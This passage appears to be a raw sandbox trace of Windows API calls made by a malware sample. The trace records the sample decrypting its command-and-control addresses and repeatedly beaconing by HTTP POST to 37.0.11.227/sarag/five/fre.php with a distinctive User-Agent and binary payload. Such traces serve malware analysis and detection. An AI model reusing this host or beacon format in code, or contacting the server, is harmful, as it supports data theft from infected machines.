lpSrch="https://") returned 0x0 [0172.329] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0172.330] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0172.331] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0172.331] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0172.331] GetProcessHeap () returned 0x690000 [0172.331] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0172.331] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3290*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0172.331] GetProcessHeap () returned 0x690000 [0172.331] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab370 [0172.331] socket (af=2, type=1, protocol=6) returned 0x264 [0172.332] connect (s=0x264, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0172.359] FreeAddrInfoW (pAddrInfo=0x6a3290*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0172.359] GetProcessHeap () returned 0x690000 [0172.359] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6ac240 [0172.359] GetProcessHeap () returned 0x690000 [0172.359] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0172.360] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0172.361] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0172.362] GetProcessHeap () returned 0x690000 [0172.362] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6ac2c8 [0172.362] GetProcessHeap () returned 0x690000 [0172.362] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0172.362] GetProcessHeap () returned 0x690000 [0172.362] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0172.362] GetProcessHeap () returned 0x690000 [0172.362] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0172.363] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0172.364] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0172.364] GetProcessHeap () returned 0x690000 [0172.364] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ac388 [0172.364] GetProcessHeap () returned 0x690000 [0172.365] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0172.365] send (s=0x264, buf=0x6ac388*, len=242, flags=0) returned 242 [0172.365] send (s=0x264, buf=0x6aba40*, len=159, flags=0) returned 159 [0172.366] GetProcessHeap () returned 0x690000 [0172.366] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6a4fc8 [0172.366] recv (in: s=0x264, buf=0x6a4fc8, len=4048, flags=0 | out: buf=0x6a4fc8*) returned 204 [0172.436] GetProcessHeap () returned 0x690000 [0172.436] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac388 | out: hHeap=0x690000) returned 1 [0172.436] GetProcessHeap () returned 0x690000 [0172.437] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0172.441] GetProcessHeap () returned 0x690000 [0172.441] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac2c8 | out: hHeap=0x690000) returned 1 [0172.441] GetProcessHeap () returned 0x690000 [0172.441] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac240 | out: hHeap=0x690000) returned 1 [0172.442] closesocket (s=0x264) returned 0 [0172.442] GetProcessHeap () returned 0x690000 [0172.443] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab370 | out: hHeap=0x690000) returned 1 [0172.443] GetProcessHeap () returned 0x690000 [0172.443] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0172.444] GetProcessHeap () returned 0x690000 [0172.444] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0172.444] GetProcessHeap () returned 0x690000 [0172.444] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0172.445] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6a4fc8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1354) returned 0x264 [0172.447] Sleep (dwMilliseconds=0xea60) [0172.449] GetProcessHeap () returned 0x690000 [0172.449] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0172.449] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.450] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0172.457] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.457] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6abd08) returned 1 [0172.484] GetProcessHeap () returned 0x690000 [0172.484] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0172.485] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.485] CryptImportKey (in: hProv=0x6abd08, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0172.496] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.496] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0172.497] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.497] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0172.497] GetProcessHeap () returned 0x690000 [0172.498] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0172.499] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.499] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0172.500] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.500] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0172.501] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.502] CryptReleaseContext (hProv=0x6abd08, dwFlags=0x0) returned 1 [0172.502] GetProcessHeap () returned 0x690000 [0172.502] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0172.502] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0172.505] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0172.506] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0172.506] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0172.507] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0172.508] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0172.509] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0172.509] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0172.509] GetProcessHeap () returned 0x690000 [0172.509] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0172.509] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0172.509] GetProcessHeap () returned 0x690000 [0172.510] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0172.510] GetProcessHeap () returned 0x690000 [0172.510] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0172.510] GetProcessHeap () returned 0x690000 [0172.510] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0172.510] GetProcessHeap () returned 0x690000 [0172.510] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0172.511] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.511] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0172.521] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.521] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6abd08) returned 1 [0172.531] GetProcessHeap () returned 0x690000 [0172.531] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0172.532] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.532] CryptImportKey (in: hProv=0x6abd08, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0172.533] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.533] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0172.535] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.536] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0172.536] GetProcessHeap () returned 0x690000 [0172.536] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0172.537] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.537] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0172.538] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.538] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0172.539] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.539] CryptReleaseContext (hProv=0x6abd08, dwFlags=0x0) returned 1 [0172.539] GetProcessHeap () returned 0x690000 [0172.539] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0172.540] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0172.540] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0172.541] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0172.542] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0172.542] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0172.543] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0172.544] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0172.544] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0172.544] GetProcessHeap () returned 0x690000 [0172.544] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0172.544] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3240*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0172.545] GetProcessHeap () returned 0x690000 [0172.545] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3f0 [0172.545] socket (af=2, type=1, protocol=6) returned 0x268 [0172.545] connect (s=0x268, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0172.578] FreeAddrInfoW (pAddrInfo=0x6a3240*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0172.578] GetProcessHeap () returned 0x690000 [0172.578] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6ac350 [0172.578] GetProcessHeap () returned 0x690000 [0172.578] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0172.579] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0172.580] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0172.580] GetProcessHeap () returned 0x690000 [0172.580] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6ac3d8 [0172.580] GetProcessHeap () returned 0x690000 [0172.581] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0172.581] GetProcessHeap () returned 0x690000 [0172.581] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0172.581] GetProcessHeap () returned 0x690000 [0172.581] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0172.582] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0172.585] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0172.585] GetProcessHeap () returned 0x690000 [0172.585] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ac498 [0172.585] GetProcessHeap () returned 0x690000 [0172.586] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0172.586] send (s=0x268, buf=0x6ac498*, len=242, flags=0) returned 242 [0172.587] send (s=0x268, buf=0x6aba40*, len=159, flags=0) returned 159 [0172.587] GetProcessHeap () returned 0x690000 [0172.587] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6a4fc8 [0172.587] recv (in: s=0x268, buf=0x6a4fc8, len=4048, flags=0 | out: buf=0x6a4fc8*) returned 204 [0172.734] GetProcessHeap () returned 0x690000 [0172.734] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac498 | out: hHeap=0x690000) returned 1 [0172.734] GetProcessHeap () returned 0x690000 [0172.734] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0172.734] GetProcessHeap () returned 0x690000 [0172.735] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac3d8 | out: hHeap=0x690000) returned 1 [0172.735] GetProcessHeap () returned 0x690000 [0172.735] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac350 | out: hHeap=0x690000) returned 1 [0172.735] closesocket (s=0x268) returned 0 [0172.736] GetProcessHeap () returned 0x690000 [0172.736] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3f0 | out: hHeap=0x690000) returned 1 [0172.736] GetProcessHeap () returned 0x690000 [0172.737] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0172.737] GetProcessHeap () returned 0x690000 [0172.737] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0172.737] GetProcessHeap () returned 0x690000 [0172.738] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0172.738] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6a4fc8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1024) returned 0x268 [0172.742] Sleep (dwMilliseconds=0xea60) [0172.743] GetProcessHeap () returned 0x690000 [0172.743] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0172.744] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.745] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0172.754] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.755] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6abd08) returned 1 [0172.878] GetProcessHeap () returned 0x690000 [0172.878] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0172.879] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.879] CryptImportKey (in: hProv=0x6abd08, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfe8) returned 1 [0172.880] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.881] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0172.882] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.882] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0172.882] GetProcessHeap () returned 0x690000 [0172.883] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0172.884] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.884] CryptDecrypt (in: hKey=0x69cfe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0172.885] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.885] CryptDestroyKey (hKey=0x69cfe8) returned 1 [0172.886] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.887] CryptReleaseContext (hProv=0x6abd08, dwFlags=0x0) returned 1 [0172.887] GetProcessHeap () returned 0x690000 [0172.887] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0172.888] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0172.888] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0172.889] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0172.889] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0172.890] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0172.890] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0172.891] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0172.892] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0172.892] GetProcessHeap () returned 0x690000 [0172.892] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0172.892] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0172.892] GetProcessHeap () returned 0x690000 [0172.893] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0172.893] GetProcessHeap () returned 0x690000 [0172.896] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0172.896] GetProcessHeap () returned 0x690000 [0172.896] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0172.897] GetProcessHeap () returned 0x690000 [0172.897] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0172.898] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.898] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0172.908] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.908] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6abd08) returned 1 [0172.917] GetProcessHeap () returned 0x690000 [0172.917] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8790 [0172.918] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.918] CryptImportKey (in: hProv=0x6abd08, pbData=0x6a8790, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfe8) returned 1 [0172.919] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.919] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0172.920] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.936] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0172.936] GetProcessHeap () returned 0x690000 [0172.937] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8790 | out: hHeap=0x690000) returned 1 [0172.938] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.938] CryptDecrypt (in: hKey=0x69cfe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0172.939] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.940] CryptDestroyKey (hKey=0x69cfe8) returned 1 [0172.940] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0172.941] CryptReleaseContext (hProv=0x6abd08, dwFlags=0x0) returned 1 [0172.941] GetProcessHeap () returned 0x690000 [0172.941] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0172.942] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0172.943] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0172.944] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0172.944] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0172.945] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0172.945] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0172.946] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0172.947] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0172.947] GetProcessHeap () returned 0x690000 [0172.947] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0172.947] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3290*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0172.947] GetProcessHeap () returned 0x690000 [0172.947] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4e0 [0172.947] socket (af=2, type=1, protocol=6) returned 0x26c [0172.948] connect (s=0x26c, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), 